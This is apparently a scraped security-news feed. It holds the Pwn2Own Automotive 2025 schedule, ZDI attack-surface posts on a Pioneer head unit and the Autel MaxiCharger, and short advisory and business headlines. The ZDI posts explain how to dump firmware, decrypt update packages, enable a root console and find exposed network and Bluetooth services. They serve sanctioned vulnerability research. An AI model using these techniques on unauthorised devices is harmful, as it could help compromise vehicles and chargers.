Wednesday, January 22 – 1430 Thanh Do (@nyanctl) of Team Confused targeting the Sony XAV-AX8500 in the In-Vehicle Infotainment (IVI) category for $20000 and 2 Master of Pwn Points. Wednesday, January 22 – 1500 Tobias Scharnowski (@ScepticCtf), Felix Buchmann (@diff_fusion), and Kristian Covic (@SeTcbPrivilege) of fuzzware.io targeting the Autel MaxiCharger AC Wallbox Commercial in the Electric Vehicle Chargers category for $50000 and 5 Master of Pwn Points. Wednesday, January 22 – 1530 Synacktiv (@Synacktiv) targeting the Kenwood DMX958XR in the In-Vehicle Infotainment (IVI) category for $20000 and 2 Master of Pwn Points. SK Shieldus(@EQSTLab) targeting the Alpine iLX-507 in the In-Vehicle Infotainment (IVI) category for $20000 and 2 Master of Pwn Points. Wednesday, January 22 – 1600 Rob Blakely and Andres Campuzano of the Technical Debt Collectors targeting the Automotive Grade Linux in the Operating System category for $40000 and 4 Master of Pwn Points. Wednesday, January 22 – 1630 Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) targeting the Sony XAV-AX8500 in the In-Vehicle Infotainment (IVI) category for $20000 and 2 Master of Pwn Points. Pwn2Own After Dark Wednesday, January 22 – 1700 Tobias Scharnowski (@ScepticCtf), Felix Buchmann (@diff_fusion), and Kristian Covic (@SeTcbPrivilege) of fuzzware.io targeting the Phoenix Contact CHARX SEC-3150 in the Electric Vehicle Chargers category for $50000 and 5 Master of Pwn Points. Riccardo Mori of Quarkslab (@quarkslab) targeting the Autel MaxiCharger AC Wallbox Commercial in the Electric Vehicle Chargers category for $50000 and 5 Master of Pwn Points. Wednesday, January 22 – 1730 Bongeun Koo(@kiddo_pwn) of STEALIEN targeting the Alpine iLX-507 in the In-Vehicle Infotainment (IVI) category for $20000 and 2 Master of Pwn Points.  Back to top Day TwoThursday, January 23 – 1100 Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) targeting the WOLFBOX Level 2 EV Charger in the Electric Vehicle Chargers category for $50000 and 5 Master of Pwn Points. PHP Hooligans targeting the Tesla Wall Connector in the Electric Vehicle Chargers category for $50000 and 5 Master of Pwn Points. Viettel Cyber Security (@vcslab) targeting the ChargePoint Home Flex in the Electric Vehicle Chargers category for $50000 and 5 Master of Pwn Points. Thursday, January 23 – 1200 The ZIEN, Inc. (@zien_security) [HANRYEOL PARK (@hanR0724), HYOJIN LEE (@meixploit), HYEOKJONG YUN (@dig06161), HYEONJUN LEE (@gul9ul), DOWON KWAK (@D0uneo), YOUNGMIN CHO (@ZIEN0621)] targeting the Kenwood DMX958XR in the In-Vehicle Infotainment (IVI) category for $20000 and 2 Master of Pwn Points. Cong Thanh (@ExLuck99) and Nam Dung (greengrass19000) of ANHTUD targeting the Alpine iLX-507 in the In-Vehicle Infotainment (IVI) category for $20000 and 2 Master of Pwn Points. Thursday, January 23 – 1300 HT3 Labs (@ht3labs) targeting the Phoenix Contact CHARX SEC-3150 in the Electric Vehicle Chargers category for $50000 and 5 Master of Pwn Points. Radu Motspan (@_moradek_), Polina Smirnova (@moe_hw) and Mikhail Evdokimov (@konatabrk) of PCAutomotive targeting the Tesla Wall Connector in the Electric Vehicle Chargers category with the Charging Connector Protocol/Signal Manipulation addon for $60000 and 6 Master of Pwn Points. Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) targeting the Autel MaxiCharger AC Wallbox Commercial  in the Electric Vehicle Chargers category for $50000 and 5 Master of Pwn Points. Thursday, January 23 – 1400 Pony 74 targeting the Kenwood DMX958XR in the In-Vehicle Infotainment (IVI) category for $20000 and 2 Master of Pwn Points. GMO Cybersecurity by Ierae, Inc. targeting the Alpine iLX-507 in the In-Vehicle Infotainment (IVI) category for $20000 and 2 Master of Pwn Points. Thursday, January 23 - 1500 Rafal Goryl of PixiePoint Security targeting the WOLFBOX Level 2 EV Charger in the Electric Vehicle Chargers category for $50000 and 5 Master of Pwn Points. Radu Motspan (@_moradek_), Polina Smirnova (@moe_hw) and Mikhail Evdokimov (@konatabrk) of PCAutomotive targeting the Sony XAV-AX8500 in the In-Vehicle Infotainment (IVI) category for $20000 and 2 Master of Pwn Points. Tobias Scharnowski (@ScepticCtf), Felix Buchmann (@diff_fusion), and Kristian Covic (@SeTcbPrivilege) of fuzzware.io targeting the ChargePoint Home Flex in the Electric Vehicle Chargers category for $50000 and 5 Master of Pwn Points. Thursday, January 23 – 1600 Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) targeting the Kenwood DMX958XR in the In-Vehicle Infotainment (IVI) category for $20000 and 2 Master of Pwn Points. Synacktiv (@Synacktiv) targeting the Tesla Wall Connector in the Electric Vehicle Chargers category with the Charging Connector Attack addon for $70000 and 7 Master of Pwn Points. CIS Team targeting the Alpine iLX-507 in the In-Vehicle Infotainment (IVI) category for $20000 and 2 Master of Pwn Points. Pwn2Own After Dark Thursday, January 23 – 1700  PHP Hooligans targeting the WOLFBOX Level 2 EV Charger in the Electric Vehicle Chargers category for $50000 and 5 Master of Pwn Points. Viettel Cyber Security (@vcslab) targeting the Sony XAV-AX8500 in the In-Vehicle Infotainment (IVI) category for $20000 and 2 Master of Pwn Points. Tobias Scharnowski (@ScepticCtf), Felix Buchmann (@diff_fusion), and Kristian Covic (@SeTcbPrivilege) of fuzzware.io targeting the EMPORIA EV Charger Level 2 in the Electric Vehicle Chargers category for $50000 and 5 Master of Pwn Points. Thursday, January 23 – 1800 Juurin Oy, Elias Ikkelä-Koski and Aapo Oksman targeting the Kenwood DMX958XR in the In-Vehicle Infotainment (IVI) category for $20000 and 2 Master of Pwn Points. Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) targeting the Tesla Wall Connector in the Electric Vehicle Chargers category for $50000 and 5 Master of Pwn Points. Compass Security (@compasssecurity) targeting the Alpine iLX-507 in the In-Vehicle Infotainment (IVI) category for $20000 and 2 Master of Pwn Points.  Back to top Day ThreeFriday, January 24 – 1100  Bongeun Koo(@kiddo_pwn) of STEALIEN targeting the Ubiquiti Connect EV Station in the Electric Vehicle Chargers category with the Charging Connector Protocol/Signal Manipulation addon for $60000 and 6 Master of Pwn Points. Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) targeting the ChargePoint Home Flex in the Electric Vehicle Chargers category for $50000 and 5 Master of Pwn Points. Friday, January 24 – 1130 Synacktiv (@Synacktiv) targeting the Sony XAV-AX8500 in the In-Vehicle Infotainment (IVI) category for $20000 and 2 Master of Pwn Points. Friday, January 24 – 1200 PHP Hooligans targeting the Kenwood DMX958XR in the In-Vehicle Infotainment (IVI) category for $20000 and 2 Master of Pwn Points. Thanh Do (@nyanctl) of Team Confused targeting the Alpine iLX-507 in the In-Vehicle Infotainment (IVI) category for $20000 and 2 Master of Pwn Points. Friday, January 24 – 1230 Tobias Scharnowski (@ScepticCtf), Felix Buchmann (@diff_fusion), and Kristian Covic (@SeTcbPrivilege) of fuzzware.io targeting the WOLFBOX Level 2 EV Charger in the Electric Vehicle Chargers category for $50000 and 5 Master of Pwn Points. Friday, January 24 – 1300 Rob Blakely and Andres Campuzano of the Technical Debt Collectors targeting the Tesla Wall Connector in the Electric Vehicle Chargers category for $50000 and 5 Master of Pwn Points. Synacktiv (@Synacktiv) targeting the Autel MaxiCharger AC Wallbox Commercial in the Electric Vehicle Chargers category with the Charging Connector Protocol/Signal Manipulation addon for $60000 and 6 Master of Pwn Points. Friday, January 24 – 1400 Evan Grant (@stargravy) targeting the Kenwood DMX958XR in the In-Vehicle Infotainment (IVI) category for $20000 and 2 Master of Pwn Points. Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) targeting the Alpine iLX-507 in the In-Vehicle Infotainment (IVI) category for $20000 and 2 Master of Pwn Points.The ResultsWe’ll be blogging and tweeting results in real-time throughout the competition. Be sure to keep an eye on the blog for the latest information. We’ll also be posting live results on Twitter, Mastodon, LinkedIn, and Bluesky, so follow us on your favorite social platform for the latest news, and keep an eye on the #P2OAuto hashtag for continuing coverage. ©2025 Trend Micro Incorporated. All rights reserved. PWN2OWN, ZERO DAY INITIATIVE, ZDI, and Trend Micro are trademarks or registered trademarks of Trend Micro Incorporated. All other trademarks and trade names are the property of their respective owners.

https://www.thezdi.com/blog/2025/1/21/pwn2own-automotive-2025-the-full-schedule
Annual Payment Fraud Intelligence Report: 2024
2025-01-21T00:00:00Z | 1737417600

Explore 2024 payment fraud trends with Recorded Future: e-skimming, scam e-commerce, dark web insights, and 2025 predictions.

https://www.recordedfuture.com/research/annual-payment-fraud-intelligence-report-2024
Cleo MFT: CVE-2024-50623
2025-01-21T00:00:00Z | 1737417600

Learn about CVE-2024-50623 affecting Cleo MFT products. Patch now to prevent RCE attacks and secure your systems.

https://www.recordedfuture.com/blog/cleo-mft-cve-2024-50623-vulnerability-analysis
"Crazy Evil" Cryptoscam Gang: Unmasking a Global Threat in 2024
2025-01-21T00:00:00Z | 1737417600

Explore how the "Crazy Evil" cryptoscam gang operates, infecting thousands worldwide with infostealer malware. Learn how its tactics pose a threat to the Web3 ecosystem and digital asset security.

https://www.recordedfuture.com/research/crazy-evil-cryptoscam-gang
Looking at the Attack Surfaces of the Pioneer DMH-WT7600NEX IVI
2025-01-20T16:00:00Z | 1737388800

For the upcoming Pwn2Own Automotive contest, a total of four in-vehicle infotainment (IVI) head units have been selected as targets. One of these is the single-DIN Pioneer DMH-WT7600NEX. This unit offers a variety of functionality, such as wired and wireless Android Auto and Apple CarPlay, USB media playback, and more. This blog post aims to detail some of the attack surfaces of the DMH-WT7600NEX unit as well as provide information on how to extract the software running on this unit for further vulnerability research.Software ExtractionThe initial effort to locate a serial console in the hope of easy software extraction bore no fruit. This left only a handful of options:·      Work with the software update package instead. However, the package was found to be encrypted, making this approach a dead end initially; more on that below.·      Attempt to desolder the eMMC chip and dump its contents using a programmer. This necessitates reballing and resoldering the eMMC chip, which is risky without proper SMD rework equipment.·      Attempt to extract eMMC contents in-system. This does not require any SMD rework, but the signal locations must be known, and the system must be powered and held in reset while dumping is in progress.The researchers chose the last option. Connecting to the eMMC chip could be performed via (thankfully labeled) test points on the board. The missing MMC_CLK signal was probed for using an oscilloscope; here is where it was found after numerous attempts. In addition to that, the main SoC was held in reset by pulling the test point labelled RSTN to ground via a 220 Ohm resistor and a switch.Note that when the SoC is held in reset, the 3.3V power line is cycled periodically by some other component, which powers off the eMMC chip. This is likely some watchdog component attempting to bring the system out of a hung state. Finding that component and persuading it not to do that was deemed too time consuming, and the 3.3V power rail was instead powered directly through a bench power supply.Data at RestAfter the eMMC chip was successfully “backed up,” it was time for Trend ZDI researchers to have a look at the 8 gigabytes of its contents. The image was found to sport a GPT partition table, with the following partitions defined after mounting the image via the loopback interface on a test system: There are two sets of bootable images, consisting of the header, boot, system, dtb, hirtos, bootloader, chips, and backup partitions. It is likely this is to safeguard against failed software updates, so there is a known good set of bootable images. Let’s have a closer look at what is contained in each partition:·      The header partition contains what looks like to be a description of other partitions in the set.·      The bootloader partition contains the bootloader as described, which seems to be a version of fastboot.·      The boot partition contains the Android/Linux kernel version 3.18.24.·      The dtb partition contains the DTB blob as described.·      The system partition contains the root file system.·      The hirtos partition contains a firmware image with ARM instructions. The exact purpose of this code is not currently known. The image consists of several chunks of code/data; some of it is obvious ARM code while others appear to be bitmap images. The following string was found inside the first chunk: “T-Monitor/triton_TCC897x Version 2.01.00” This suggests the code is to be executed on the main SoC but likely on a separate core.·      The chips partition contains the firmware for the GNSS daughter board.·      The backup partition contains some kind of binary data, rather sparsely organized.Interestingly enough, the system itself appears to be a Linux-based one; none of typical Android infrastructure could be located there. All the custom software is concentrated in /usr/local/ subdirectories.Software UpdatesObtaining an image of the code running on the device allowed a second look at the software update format. The latest update file can be obtained from the manufacturer; unfortunately, they do not seem to list previous versions. This is justified, as downgrading the software is not officially supported anyway—as the team found out firsthand.The software update package is structured like this:·      A header of 0x100 bytes describing the file, specifically the header size and the total size of the image, software version in this update, plus which model the update is for.·      An RSA signature block of 0x100 bytes, which can be verified by a certain public key hardcoded in the software. The signature covers the described header only.·      An RSA signature block of 0x100 bytes, which can be decrypted by the same key, and which carries an AES-256 key instead of the digest.·      Update data, encrypted with AES-256-CBC using the all-zero IV. This decrypts into a gzipped “raw” update image.The raw update image in turn consists of headers very similar to what can be found in the header partitions followed by a series of images for each partition mentioned in the headers. The image(s) can be processed further to extract the content of interest like the root file system.Serial ConsoleArmed with some knowledge of the unit’s software, it was time to revisit the search for the serial console.By studying the contents of the bootloader partitions, Trend ZDI researchers discovered the bootloader may use values from the backup partitions to decide which values to pass via the `console` and `login` kernel parameters, among other things. Specifically, the sector at byte offset 0x800800 contains that data. The format which this data is in can be reverse engineered both from the bootloader and the NPSystemDebug class implementation. Notably, it appears that manipulation of these values could be performed via the UI as the code flow can be traced all the way to the `UI_UIEB_MM_99_018` class which implements two buttons changing the state of the values. However, at the moment of writing it was unknown how to reach that specific UI screen.Thus, the direct manipulation of the flags was chosen instead. The contents of the backup partition were altered to enable both serial console and the login prompt. After probing the board connectors for any semblance of serial data, it was discovered on CN3603 pin 7. Connecting a UART-to-USB dongle to that pin confirmed that indeed, console output is present, as well as the login prompt. Only three signals are routed to that connector; however, the RX signal was not immediately identified among those.Studying the bottom layer of the board showed a single installed passive among several missing ones; this was one resistor pulling up a line otherwise not connected to any connector pin. Probing that line for being the missing RX line resulted in a success. Likely, one of the missing passives should connect that line to a connector pin. Now it was possible to communicate with the device—and log in locally. Having console access is always a big boon in vulnerability research.BluetoothThe vendor lists the following supported Bluetooth profiles:·      Advanced Audio Distribution Profile (A2DP)·      Hands-Free Profile·      Serial Port Profile·      Audio/Video Remote Control Profile (AVRCP) v1.6Given the rich history of bugs in Bluetooth-related functionality, this could be an interesting attack vector Wi-FiThe unit can be set up in both the client and access point modes for Wi-Fi.When in the AP mode, the unit allows using the WPS setup in addition to entering the PSK. This could potentially be an interesting attack angle as WPS flows were historically weak to attacks.After connecting to the unit in AP mode and running a network scan, the following TCP ports were found to be open: 5000, 38000, 38001, 42000, 43000, and 60000. Nmap script scan only showed that port 5000 uses TLS with a self-signed certificate; other services were not recognized. Using the console access, it is possible to map out the open ports to the corresponding processes (only ports allowed through the iptables are shown here for brevity): Given the abundance of what looks like non-standard services, Wi-Fi connectivity presents a potenially rewarding target for vulnerability research.USBThe unit is equipped with a single USB-C port that provides the necessary interface for wired Android Auto and Apple CarPlay. The USB port also supports playback of audio files from a USB flash drive. The supported audio filetypes are ·      MP3·      WMA·      WAV·      AAC·      FLAC·      DSDThe unit also supports video playback with the following formats listed as supported:·      AVI·      MPEG·      DivX·      MP4·      3GP·      MKV·      FLV·      WMV/ASF·      M4V·      H.263, H.264In addition, it is also possible to view images in BMP, JPEG, and PNG formats. Parsing complex file formats is error-prone and has been a rich source of exploitable bugs since time immemorial.Android Auto and Apple CarPlay Both wired and wireless Android Auto and Apple CarPlay are supported without the need for a third-party application to be installed on the paired mobile phone. When using the wireless versions, the paired phone connects to the aforementioned Wi-Fi network to establish a high-bandwidth channel for data to be sent and received. When connecting using a USB cable, the Wi-Fi network isn't used by Android Auto or Apple CarPlay and can be disabled in Settings. As evidenced above, the `Media` process is likely responsible for handling both.Pwn2Own Automotive 2024 didn’t see any entries that leveraged Android Auto or Apple CarPlay functionality to compromise a head unit. We will have to wait and see if Pwn2Own Automotive 2025 does!SummaryWe hope that this blog post has provided enough information about the Pioneer DMH-WT7600NEX attack surface to guide vulnerability research. Not every attack surface has been mentioned, and we encourage researchers to investigate further. We are looking forward to Automotive Pwn2Own, again to be held in January 2025 at the Automotive World conference in Tokyo. We will see if IVI vendors have improved their product security. Don’t wait until the last minute to ask questions or register! We hope to see you there.You can find me on Mastodon at @InfoSecDJ, and follow the team on Twitter, Mastodon, LinkedIn, or Bluesky for the latest in exploit techniques and security patches.

https://www.thezdi.com/blog/2025/1/16/looking-at-the-attack-surfaces-of-the-pioneer-dmh-wt7600nex-ivi
Riasztás Microsoft termékeket érintő sérülékenységekről – 2025. január
2025-01-20T12:22:36Z | 1737375756

A Nemzetbiztonsági Szakszolgálat Nemzeti Kibervédelmi Intézet (NBSZ NKI) riasztást ad ki a Microsoft szoftvereket érintő kritikus kockázati besorolású sérülékenységek kapcsán, azok súlyossága, kihasználhatósága és a szoftverek széleskörű elterjedtsége miatt.

https://nki.gov.hu/figyelmeztetesek/riasztas/riasztas-microsoft-termekeket-erinto-serulekenysegekrol-2025-januar/
Beware of Contacts through LinkedIn: They Target Your Organization’s Property, Not Yours
2025-01-20T06:30:00Z | 1737354600

There have recently been reports of unau...

https://blogs.jpcert.or.jp/en/2025/01/initial_attack_vector.html
Security Alert (A25-01-11): Multiple Vulnerabilities in Microsoft Edge
2025-01-20T04:00:00Z | 1737345600

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
NSFOCUS Included in External Threat Intelligence Service Providers Landscape Q1 2025
2025-01-20T03:02:16Z | 1737342136

Santa Clara, Calif. January 20, 2025 – NSFOCUS, a global provider of intelligent hybrid security solutions, announced that it has been included in the Forrester report, The External Threat Intelligence Service Providers Landscape, Q1 2025 among Notable Providers recently. This is the second time for NSFOCUS to be included in this report, as we have […] The post NSFOCUS Included in External Threat Intelligence Service Providers Landscape Q1 2025 appeared first on NSFOCUS, Inc., a global network and cyber security leader, protects enterprises and carriers from advanced cyber attacks..

https://nsfocusglobal.com/nsfocus-included-in-external-threat-intelligence-service-providers-landscape-q1-2025/
Tarbomb Denial of Service via Path Traversal
2025-01-17T14:46:39Z | 1737125199

Praetorian recently uncovered a denial-of-service vulnerability by chaining together path traversal and legacy file upload features in a CI/CD web application; highlighting the risks of undocumented features and the importance of input validation in web security. The post Tarbomb Denial of Service via Path Traversal appeared first on Praetorian.

https://www.praetorian.com/blog/tarbomb-denial-of-service-via-path-traversal/
DNS Silently Powers the Internet
2025-01-17T14:00:00Z | 1737122400

As a part of almost every internet transaction, the Domain Name System is powerful, lightweight, and ubiquitous ? and delivers value for a modest investment.

https://www.akamai.com/blog/security/2025/jan/dns-silently-powers-the-internet
December 2024 Retail Sales Drop Despite Festive Season
2025-01-17T11:30:49Z | 1737113449

“According to the December 2024 Retail Sales Index from the Office for National Statistics, 2024 ended on a disappointing note – with a drop in December retail sales volumes of 0.3% compared to November, and a mediocre rise in total spend of just 0.1% from the prior month. This result is all the more shocking when considering that the period in question covers spend from both Black Friday sales and the festive season. “Consumers did however splash out to some extent over the holiday season, with a solid 6.8% growth on the prior year in retail spend at non-food stores. However, we should take this news with caution. Much of this spend growth can be linked to the equally growing level of consumer debt. In-fact, consumer unsecured debt level grew significantly faster than inflation in 2024.i” “So far we’ve seen an impressive level of resilience amongst consumers, despite continued cost of living pressures, but cracks are beginning to appear in the form of poor December retail sales results coupled with the growing levels personal debt.” "We should also observe that sales volumes in what should be one of the strongest sales months of the year remained a full 2.5% below pre-pandemic levels, highlighting the enduring impact of the UK's challenging economic climate. “Retailers will need to adapt swiftly, focusing on value-driven offerings, seamless shopping experiences, and strategic responses to shifting demands. In this climate, understanding consumer behaviour remains critical, with data-driven insights helping businesses navigate these complex challenges."

https://newsroom.transunion.co.uk/december-2024-retail-sales-drop-despite-festive-season/
Спроби здійснення кібератак з використанням AnyDesk, нібито, від імені CERT-UA
2025-01-17T09:55:06Z | 1737107706

Урядовою командою реагування на комп'ютерні надзвичайні події України CERT-UA отримано інформацію про непоодинокі випадки спроб підключень до комп'ютерів з використанням програми AnyDesk, нібито, від імені CERT-UA.

https://cert.gov.ua/article/6282069
Quishing: when a QR code becomes a trap
2025-01-17T09:40:39Z | 1737106839

The threat landscape is evolving by the day. The latest phenomenon, Quishing, exploits QR codes to trick their target. These widely used codes are a simple and effective way to link the physical and digital worlds. They are used on packaging, posters and even business cards to easily direct their audience to a website. This practical, democratized tool is being hijacked by cybercriminals, becoming a new threat to users. But what exactly is Quishing?

https://blog.pradeo.com/quishing-when-qr-code-becomes-trap
API & SaaS Protection with Advanced URL Filtering
2025-01-17T08:28:59Z | 1737102539

Cyber security is key to protecting APIs and SaaS gateways from emerging threats. Businesses rely on secure infrastructure to protect their data, customer trust and achieve strategic goals. At Data443 we help organizations tackle these challenges head on with our Web Security Engine. Here’s how a leading technology services company did it with our advanced URL filtering. The post API & SaaS Protection with Advanced URL Filtering appeared first on Data443.

https://data443.com/api-and-saas-protection-with-advanced-url-filtering/
High Threat Security Alert (A25-01-10): Multiple Vulnerabilities in Ivanti Products
2025-01-17T04:00:00Z | 1737086400

Ivanti has released security advisories to address multiple vulnerabilities in Ivanti products.

https://www.govcert.gov.hk/en/alerts_detail.php
Akamai Named a Major Player in IDC MarketScape: Worldwide Public Cloud IaaS 2025 Assessment
2025-01-16T17:00:00Z | 1737046800

https://www.akamai.com/blog/cloud/2025/jan/akamai-named-a-major-player-in-idc-marketscape
Reviewing the Attack Surface of the Autel MaxiCharger: Part Two
2025-01-16T16:00:00Z | 1737043200

Previously, we covered the internals of the Autel MaxiCharger where we highlighted each of the main components. In this post, we aim to outline the attack surface of the MaxiCharger in the hopes of providing inspiration for vulnerability research.All information has been obtained through reverse engineering, experimenting, and combing through the Autel MaxiCharger manual (PDF).At the time of writing the following software versions were applicable:·      Autel Charge app v3.0.7·      Autel Config app v2.1.0·      Autel MaxiCharger modules: ·      Charge Control v1.36.00 ·      Power Control v1.21.00 ·      LCD Control v0.99.31 ·      LCD Information v0.99.08 ·      LCD Resources v0.99.08 ·      LCD Languages v0.04.04Mobile ApplicationsAutel has published two mobile applications for both Android and iOS. The main app is called Autel Charge and contains functionality intended for end users. Some of the features include:·      Defining charging schedules·      Load balancing·      Providing Wi-Fi credentials for the charger to use·      Forcing firmware updates·      OCPP server selection (including custom servers)·      Current limiting·      Finding other chargers on a map·      Checking charger version informationUpon loading the app on a rooted Android device a superuser request can be seen. This was unexpected and points towards the app employing anti-reversing measures. Denying the request loads the app normally. Figure 1: Autel Charge superuser request After denying the superuser request a new Autel account can be created using an email address.The second app is named Autel Config and allows installers / technicians to configure chargers and manage tickets. Unlike the Autel Charge app, there is no option to register for an account and providing Autel Charge account credentials doesn't work. This suggests that installers / technicians have some other way of obtaining valid credentials.Further research into these apps could be valuable to better understand how the apps and charger communicate. Network Traffic AnalysisUsing the Autel Charge app the MaxiCharger was configured to connect to a researcher controlled Wi-Fi network in order to monitor the network traffic. The app and charger were then left idling whilst the traffic was captured. A few DNS requests were sent out from the charger (192.168.200.66) for Autel related infrastructure. Figure 2: Charger DNS queries The first query was for gateway-eneprodus.autel.com which is an alias of eneprodus-alb-internet-2014464356.us-west-2.elb.amazonaws.com. This resolved to the following IP addresses (shown in the order received):        • 54.185.127.160       • 52.36.153.97       • 44.240.206.177       • 34.215.58.124 Straight after the first DNS query response a TLS session was set up and encrypted data was sent by the charger on port 443 to 54.185.127.160. Data was sent back and forth between the charger and server a few times before another DNS query was sent. The charger issued another query for gateway-eneprodus.autel.com which, as before, is an alias and returned the same IP addresses but in a different order presumably due to load balancing. This time the DNS query returned the IP addresses:        • 34.215.58.124       • 44.240.206.177       • 54.185.127.160       • 52.36.153.97 Like previously, the charger used the first IP address that was returned but this time no TLS session was set up. Plain HTTP was used. Figure 3: HTTP traffic Looking a bit closer showed the charger periodically sending log data to the Autel server. The server always responded with JSON that had a null data value, a 200 code value and a message value of OK. Figure 4: HTTP POST traffic After a while the charger made another DNS request for gateway-eneprodus.autel.com, this time the 44.240.206.177 IP address was returned first. The charger then sent a HTTP POST to /api/app-version-manager/version/upgrade/ota with device related details such as the serial number and current firmware version. The server responded with JSON containing firmware update related information including a URL to download the latest version. Figure 5: HTTP firmware related traffic The charger then proceeded to send a DNS request for s3.us-west-2.amazonaws.com and directly downloaded the firmware update over HTTP. The same pattern was observed multiple times as the device downloaded firmware updates for each of its modules. A list of these modules and their versions can be viewed in the Autel Charge app by navigating to the Charger Info page. Figure 6: MaxiCharger module versions After the firmware was updated and the charger rebooted no further HTTP traffic was observed to the logging or firmware update endpoint, instead only HTTPS was used.Port scanning the charger over Wi-Fi showed no open TCP or UDP ports however UDP ports 6000 and 6666 appear to be listening over the Ethernet interface. The Ethernet interface is a valid target for the competition so these 2 listening services may be worth researching further.Bluetooth Low EnergyBy default the MaxiCharger uses the device serial number as the device name when advertising over Bluetooth. Once connected there are 4 available services that offer a total of 14 characteristics. Autel Charge uses these endpoints to communicate with the charger. A dump of each service and associated characteristics is shown below. Further research into Autel Charge and Autel Config will likely assist in understanding the bluetooth services better.FirmwareAs mentioned in the previous blog the main microcontroller has readout protection enabled however this can be bypassed using techniques covered in Jonathan Andersson's and Thanos Kaliyanakis' Blackhat EU talk. Keep an eye out for future blog posts that will cover these techniques. One of which doesn't require glitching!The main firmware can also be acquired by sniffing the charger update process (as described in the Network Traffic Analysis section) or by reversing the app to figure out the download URLs. The firmware of ESP32 WROOM 32D module can be dumped using the standard esptool.py from Espressif. During research it was noted that the esptool.py would sometimes fail to dump the full firmware image. To mitigate this the firmware can be dumped in smaller chunks and then stitched back together into a single blob. Other Potential Attack SurfacesThere are a few other attack surfaces that are considered in scope and are worth mentioning. One of these is the undocumented USB C port that can be found behind a small panel on the side of the unit. There is no publicly available information about what this USB port is used for.Also, next to the USB port is the SIM card tray. Attacks that utilize a SIM card are also considered to be in scope.And finally, there is the RFID (NFC) reader.SummaryHopefully this blog post provides enough information to kickstart vulnerability research against the Autel MaxiCharger. We are looking forward to Pwn2Own Automotive again in Tokyo in January 2025 at Automotive World, and we will see if IVI vendors have improved their product security. Don’t wait until the last minute to ask questions and register! We hope to see you there.You can find me on Twitter at @ByteInsight, and follow the team on Twitter, Mastodon, LinkedIn, or Bluesky for the latest in exploit techniques and security patches.

https://www.thezdi.com/blog/2025/1/15/reviewing-the-attack-surface-of-the-autel-maxicharger-part-two
UEFI Secure Boot: Not so secure
2025-01-16T15:40:20Z | 1737042020

ESET researchers uncover a vulnerability in a UEFI application that could enable attackers to deploy malicious bootkits on unpatched systems

https://www.welivesecurity.com/en/videos/uefi-secure-boot-not-so-secure/
Akamai API Security Release 3.41
2025-01-16T13:00:00Z | 1737032400

https://www.akamai.com/blog/security/2025/jan/akamai-api-security-release-3-41
ESG Watch | January 2025
2025-01-16T10:34:44Z | 1737023684

Key news in this edition: Ongoing forced labour concerns in global clean tech supply chain. Canadian government proposes new supply chain due diligence measures to combat forced labour. Nasdaq’s board diversity rule struck down by a US appeals court. Editorial As we move into 2025, recent ESG developments signal that businesses must strengthen governance frameworks, adopt proactive risk management, and approach sustainability in a way that integrates both social and environmental impacts. The clean tech sector, crucial to the global energy transition, faces growing scrutiny over forced labour in its supply chains. Reports have highlighted links between EV and solar manufacturers and forced labour in China’s Xinjiang province and in Brazil. Whilst not surprising, the growing focus on the issue raises critical concerns for ESG investors, emphasising the need for rigorous due diligence to ensure human rights are upheld alongside environmental progress. Governments are also stepping up their efforts to address these issues. Canada’s proposed Due Diligence Act, aimed at combating forced labour, will require businesses to implement proactive supply chain risk management strategies. This move aligns with international standards and signals a shift towards stricter supply chain regulations, urging companies to be transparent in their operations. In the UK, Scotland’s proposed Ecocide Prevention Bill will introduce legal accountability at the corporate executive level for environmental destruction. This bill, alongside similar efforts in Belgium, underscores the growing momentum for policies that deter mass pollution and hold decision-makers accountable. Continuing the theme of corporate governance, a US appeals court struck down Nasdaq’s proposed board diversity rules, marking a setback in efforts to increase transparency on diversity, equity, and inclusion. While the ruling may reduce mandatory disclosure, investor and consumer expectations will continue to drive companies to voluntarily disclose diversity data.

https://www.s-rminform.com/esg-watch/esg-watch-january-2025
Under the cloak of UEFI Secure Boot: Introducing CVE-2024-7344
2025-01-16T10:00:00Z | 1737021600

The story of a signed UEFI application allowing a UEFI Secure Boot bypass

https://www.welivesecurity.com/en/eset-research/under-cloak-uefi-secure-boot-introducing-cve-2024-7344/
Digital Evolution and Cybersecurity: Anticipating the Challenges of 2025
2025-01-15T14:00:28Z | 1736949628

Each year, cybersecurity increasingly becomes a crucial pillar of digital ecosystems, and 2025 will be no exception. The rapid changes in the technological landscape, coupled with the growing ambitions of cyber attackers, are constantly redefining the rules of the game. Here are our predictions for a pivotal year.

https://blog.pradeo.com/digital-evolution-and-cybersecurity-anticipating-the-challenges-of-2025
Akamai?s Tailored Approach to Net Zero
2025-01-15T13:00:00Z | 1736946000

https://www.akamai.com/blog/sustainability/2025/jan/akamai-tailored-approach-to-net-zero
Cybersecurity and AI: What does 2025 have in store?
2025-01-15T10:00:00Z | 1736935200

In the hands of malicious actors, AI tools can enhance the scale and severity of all manner of scams, disinformation campaigns and other threats

https://www.welivesecurity.com/en/cybersecurity/cybersecurity-ai-what-2025-have-store/
High Threat Security Alert (A25-01-07): Multiple Vulnerabilities in Microsoft Products (January 2025)
2025-01-15T04:00:00Z | 1736913600

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A25-01-08): Multiple Vulnerabilities in Fortinet Products
2025-01-15T04:00:00Z | 1736913600

Fortinet released security advisories to address multiple vulnerabilities in Fortinet systems.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A25-01-09): Multiple Vulnerabilities in Google Chrome
2025-01-15T04:00:00Z | 1736913600

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Search Central Live is returning to Brazil
2025-01-15T04:00:00Z | 1736913600

We're excited to announce that Search Central Live is returning to São Paulo in 2025. Following our successful events in 2023 and 2024, we're continuing our mission to help Brazilian businesses enhance their site's performance in Google Search. And this year we're visiting Recife for the first time.

https://developers.google.com/search/blog/2025/01/search-central-live-brazil
Simplifying the visible URL element on mobile search results
2025-01-15T04:00:00Z | 1736913600

